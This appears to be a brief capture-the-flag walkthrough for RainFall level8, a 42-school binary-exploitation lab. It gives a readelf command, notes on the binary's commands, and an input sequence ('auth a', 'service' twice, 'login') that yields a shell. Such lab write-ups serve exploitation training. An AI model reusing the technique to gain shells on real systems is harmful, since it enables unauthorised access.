# **************************************************************************** #
#                                                                              #
#                                                         :::      ::::::::    #
#    walkthrough                                        :+:      :+:    :+:    #
#                                                     +:+ +:+         +:+      #
#    By: lgarczyn <lgarczyn@student.42.fr>          +#+  +:+       +#+         #
#                                                 +#+#+#+#+#+   +#+            #
#    Created: 2019/05/04 18:52:35 by lgarczyn          #+#    #+#              #
#    Updated: 2019/05/04 18:52:48 by lgarczyn         ###   ########.fr        #
#                                                                              #
# **************************************************************************** #


readelf -x .rodata ./level8

printf auth service
auth -> auth = arg
reset -> free(auth)
service -> service = arg
login -> disp Password or SH


level8@RainFall:~$ ./level8
(nil), (nil)
auth a
service
service
login
$